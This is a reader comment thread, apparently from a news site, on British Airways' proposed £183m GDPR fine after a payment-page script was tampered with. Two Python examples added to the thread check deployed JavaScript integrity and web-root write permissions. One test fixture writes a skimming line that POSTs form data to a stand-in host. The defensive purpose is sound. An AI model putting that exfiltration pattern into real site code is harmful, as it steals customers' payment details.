Re: Great solution
Therein lies a problem. If a sufficient number were knowledgeable enough to use blockers there'd be a sort of herd immunity, in that the site owners would have to make a choice between tightening up or losing custom.
The UK Information Commissioner's Office has warned British Airways it faces a whopping £183.39m fine following the theft of customer records from its website and mobile app servers. The record-breaking fine - more or less the lower end of the price of one of the 747-400s in BA's fleet - under European General Data Protection …
"If a sufficient number..."
Which is highly unlikely to ever happen. Ever asked a non-techie to use NoScript? Hard enough convincing them to use unique passwords and patch their shit which is of far greater benefit. Blocking scripts, while interesting and useful in some cases, is not a workable solution.
No, blocking scripts is not a workable solution for certain scenarios, and I hate to say this, because I use half a dozen (or more) ad blockers, on top of script-blocking. But when I buy (not search for!) an airline ticket, or any other product or service online, I go to the old ugly IE. I just don't have time / patience to chase my bank or shop over the phone, when my payment, put through well-defended Firefox, comes up with an "oops, something went wrong" page.
We live in a place where we pick what we like to be exposed to and what actions we do that will affect our lives, like what to eat, who to meet, and which javascript to load.
Unlike the common people like you who just blindly put their trust on random strangers and hope you don't get F*cked and Gripped, when in reality real people are getting F*cked and Gripped for the very same mistake.
Bonuses - hell no.
Dividends - likely, though not included in the latest dividend (£700M paid today, by the way...) since nothing has been fined yet. If that £183M needs to be paid at a later date, it will affect the dividend and probably the stock price as well.
Year-over-year the stock has lost almost 40% of its value, which may make some investors a tad nervous. This tanking probably has very little to do with this data blurt, but heads may roll in any case.
The data was stolen from BA. BA have been stolen from and now they will be fined for being the victim of theft. They are cooperating with the investigation, and the attackers seem to be known as a criminal group who do this.
Just reads a little odd. Maybe BA did bad. But I must have missed that bit.
Eh?
If a bank took your valuables, charged you for the privilege of having an account to store these things and then left the safe door open letting everything be stolen one evening, would you be thinking "aw, poor bank, they didn't mean it to happen, never mind about my precious things, you look sad"? I don't think so.
As someone else has pointed out, if you do everything you should have done and data is still stolen from you then in all likelihood you will not be fined by the ICO.
BA were incompetent and thoroughly deserve a multimillion £ kick in the nads. I'd also add IMHO they are bloody incompetent as an airline as well.
I understand the replies I am getting, that BA was to be responsible for the data. But the data can always be got to in some way or other and so anyone can be stolen from (physical or digitally) as proven every day.
I have no problem with a fine for BA if they didn't do the expected things to protect the data (and that might be the case here, I just didn't see it) but to be fined because you were stolen from, even if it's other people's property stolen from your possession, seems harsh.
I am not against strong protection of user data. But if we want users then data will be collected and there is always a possibility of compromise. All you can do is best practices.
It's negligence: British Airways failed to protect customers' personal data correctly.
GDPR makes it quite clear that companies that can demonstrate that they have followed the recommendations of the data protection regulators have little to fear. In essence, GDPR limits their exposure to cases brought as a result of their behaviour, as courts can point to the settlement and say: dealt with.
By contrast look at some of the settlements across the pond. Boeing has set aside $ 100 million as compensation for the US victims of two plane crashes and Equifax is subject of at least one class action.
However, at the end of the day, the fine sounds worse than it actually is, because it is a charge that can be offset against tax.
"By contrast look at some of the settlements across the pond. Boeing has set aside $ 100 million as compensation for the US victims of two plane crashes and Equifax is subject of at least one class action"
It seems disproportionate to me. I don't know the details but it was not the case that BA took no security measures, and once they knew there was an issue they did respond, albeit that the measures and response may have been inadequate and/or tardy. The fine seems orders of magnitude more than reasonable and this is reinforced by the comparison with Boeing.
Boeing's provision is half the fine against BA. It is quite clear that they designed and manufactured an aircraft which was unsafe. The issue was, even given allowance for hindsight, of such an obvious nature it should have been identified, and there is evidence that the information given to the regulator was misleading and inaccurate. Hundreds of people have died as a result of this and yet the provision made is only half the amount that BA have been fined as a result of being victims of a criminal attack for which they were not responsible and in which no one was injured or likely to be injured, let alone killed.
There is a massive disconnect between these two numbers.
"The total proposed fine of £183.39 million would be the biggest penalty ever issued by the ICO.
It is the equivalent of 1.5% of BA's global turnover for the financial year ending December 31 2018."
Ref: https://www.standard.co.uk/news/uk/british-airways-fined-more-than-180m-for-customer-data-breach-a4184376.html
Pretty sure fines aren't tax-deductible...
Edit:
https://www.gov.uk/hmrc-internal-manuals/business-income-manual/bim42515
"Regulatory bodies
Where a trader incurs a liability to a regulatory body on revenue account that is broadly intended to cover the regulator’s costs of performing its duties in relation to the trading activities, such costs will normally be allowable even where the trader has committed a breach of regulations. However, should a regulatory body impose a penalty for breach of regulations, or should a penalty or fine become payable as a result of a prosecution for a trader’s breach of regulations, this will not be an allowable expense (see McKnight v Sheppard [1999] 71TC419)."
To get a car analogy in: if you replace your tyres because they are worn below the minimum tread depth, the cost of the tyres is deductible, regardless of whether you replaced them on time or (way) too late. However, the fine you get for driving with worn tyres is not deductible. That seems remarkably in line with common sense...
Thank you for clearing that up; too many people here seem to think companies can just deduct fines when clearly they can't.
The article https://www.theregister.co.uk/2018/09/11/british_airways_website_scripts/ points out how attacks like this work.
In essence a JS file hosted on BA's own domain was modified so it posted details to a third-party domain. The fact the JS file could be modified on their production server is in itself scary, but how can you protect against that?
An easy way is just to monitor the filesystem for changes to any .js file, say every hour. Perhaps diff it against the master copy in their version control. If there are differences email the entire development team as that safeguards against it being an inside job.
A couple of mins work, save several million quid in fines and pissing off a load of (lost) customers. Too simple perhaps?!
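The check described in the comment above, as an added example that is not part of the thread or of any BA tooling: hash every .js file under the deployed web root, compare against a baseline manifest built from the master copy (the version-control checkout), and report modified, added and removed files. It goes one step beyond the comment by also listing, for each modified file, any external hostname the deployed copy references that the master does not, which is the signature of a script rewritten to post form data elsewhere. The directory layout, file contents and hostnames are constructed for the demonstration; the email step is left to whatever alerting the team already has.

```python
"""Integrity check for deployed JavaScript against the version-control copy.

Added illustration, not BA's or The Register's code. Sample files and
hostnames below are constructed for the demo.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Hostname of any absolute http(s) URL referenced in a script.
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map each .js file under root (relative POSIX path) to its SHA-256."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*.js"))
        if p.is_file()
    }


def external_hosts(text: str) -> set:
    return set(HOST_RE.findall(text))


def compare(master: Path, deployed: Path) -> dict:
    """Diff the deployed web root against the master (version-control) copy.

    Returns modified / added / removed relative paths and, per modified
    file, every hostname the deployed copy references that master does not.
    """
    base = build_manifest(master)
    live = build_manifest(deployed)
    modified = sorted(p for p in base if p in live and base[p] != live[p])
    new_hosts = {}
    for rel in modified:
        before = external_hosts((master / rel).read_text(errors="replace"))
        after = external_hosts((deployed / rel).read_text(errors="replace"))
        if after - before:
            new_hosts[rel] = sorted(after - before)
    return {
        "modified": modified,
        "added": sorted(set(live) - set(base)),
        "removed": sorted(set(base) - set(live)),
        "new_hosts": new_hosts,
    }


def demo() -> dict:
    """Constructed scenario: checkout.js gains a POST to a third-party host
    and an unknown dropper.js appears in the deployed tree."""
    with tempfile.TemporaryDirectory() as tmp:
        master = Path(tmp, "master")
        deployed = Path(tmp, "deployed")
        legit = "fetch('https://www.example.com/api/pay', {method:'POST', body:form});\n"
        for root in (master, deployed):
            (root / "js").mkdir(parents=True)
            (root / "js" / "checkout.js").write_text(legit)
            (root / "js" / "ui.js").write_text("console.log('ui');\n")
        # Tampered copy: the legitimate call is kept so the page still works,
        # and a second call exfiltrates the same form to another domain.
        (deployed / "js" / "checkout.js").write_text(
            legit
            + "fetch('https://collect.example.net/x', {method:'POST', body:JSON.stringify(form)});\n"
        )
        (deployed / "js" / "dropper.js").write_text("/* unknown file */\n")
        return compare(master, deployed)


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

Two practical notes: run the comparison from a host that is not the web server (the baseline and the checker are worthless if the same write access that rewrote checkout.js can also rewrite them), and remember that this only covers scripts on your own origin; an inline script injected into the HTML or a tampered third-party script loaded from a CDN needs a separate check.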
"but how can you protect against that"
One of the standard settings for any webserver is that its user cannot write to any of its files, so that it exists in an effectively read-only file-system. This should be standard practice, as it was the go-to exploit in the days of CGI.
But that itself is not the reason for the size of the fine. There was systematic failure across the line, including on how the data was stored.
The GDPR wording talks about turnover of the Undertaking, which would extend to the whole of IAG, especially if IT systems are managed as a group resource.
This would allow the fine to grow.
183m is a baby of a fine, and considering the circumstances, size of breach and the Blue Chip status of the BA name, not unreasonable.
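The read-only web root point made above, as an added example that is not from the thread or from any real deployment: an audit that walks the served tree and reports every file or directory the web-server account could modify, either because it owns the inode (an owner can always chmod it back) or because a group or world write bit is set. A writable directory is flagged as well as a writable file, since an attacker who can write the directory can replace checkout.js even when the file itself is read-only. The uid/gid used for the server account and the sample tree are assumed values constructed for the demo.

```python
"""Audit a web root for anything the web-server account could modify.

Added illustration; not from the thread or any BA system. The server
process should run as a low-privilege account that owns none of the files
it serves and holds no write bit on them. WEB_UID/WEB_GID are assumed.
"""
import os
import stat
import tempfile
from pathlib import Path

WEB_UID, WEB_GID = 65534, 65534  # assumed ids for the server account


def writable_by(st: os.stat_result, uid: int, gids: set) -> bool:
    """True if an account with this uid and these groups could write the inode.

    Mirrors the ordinary owner/group/other mode check; POSIX ACLs, immutable
    flags and read-only mounts are not considered.
    """
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def audit_webroot(root: Path, web_uid: int, web_gids: set) -> list:
    """Return (relative path, reason) for every entry the web user could change."""
    findings = []
    for path in sorted(root.rglob("*")) + [root]:
        st = path.lstat()
        if stat.S_ISLNK(st.st_mode):
            continue  # symlink modes are meaningless; the target is visited separately
        rel = path.relative_to(root).as_posix()
        if st.st_uid == web_uid:
            findings.append((rel, "owned by web user"))
        elif writable_by(st, web_uid, web_gids):
            findings.append((rel, "writable by web user"))
    return sorted(findings)


def demo() -> list:
    """Constructed tree: one correctly locked-down script and two mistakes."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        js = root / "js"
        js.mkdir()
        good = js / "checkout.js"
        good.write_text("// served read-only\n")
        good.chmod(0o644)            # owner rw, everyone else read-only
        bad = js / "vendor.js"
        bad.write_text("// left world-writable after a hurried deploy\n")
        bad.chmod(0o666)
        uploads = root / "uploads"
        uploads.mkdir()
        uploads.chmod(0o777)         # the classic 'make it work' mistake
        os.chmod(root, 0o755)
        os.chmod(js, 0o755)
        return audit_webroot(root, WEB_UID, {WEB_GID})


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason}: {rel}")
```

The clean state this audit expects is the usual one: files owned by a deploy account (or root) with mode 0644, directories 0755, and the server running as a different unprivileged user. Run it from a deploy pipeline or a cron job so a permissions regression is caught before it is needed; pair it with a read-only mount of the web root where the platform allows it.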
So they spent their time and money trying to monetise personal data, rather than trying to secure personal data. And people are moaning that they've now had to pay a fine for all the damage it caused?
Serves them right for seeing personal data as an opportunity rather than a responsibility.
I'd probably sack them off; I'm sure a decent contract will allow that, and possibly recover charges if they are irresponsible. Although if they lost the data would they be the ones getting the fines? The thing I like about GDPR is that it makes companies think about data where they probably have not bothered before.
"... heavily outsourced IT... slips up ... major GDPR breach and fine..."
You are the data handler, therefore you get the fine. It is YOUR responsibility to ensure the outsourcer is secure.
This is not much different than a retailer's obligation on sale of goods, vs recovering costs from the suppliers.
Further litigation between you and the outsourcer over the issue may or may not come under the regulators' purview, depending on how the data was handled and the contracts setup, but you can be assured that if you didn't do your due diligence in the first place you're going to get doubletapped pretty hard by the regulators up front.
Fine not high enough. Besides, no one mentions the fact that BA has outsourced their ops offshore with the penny-pinching mindset so many have; yes, it's cheap, but it also comes with an army of mostly short-skilled people who replaced those they once used to have in-house. To their management, it's working well.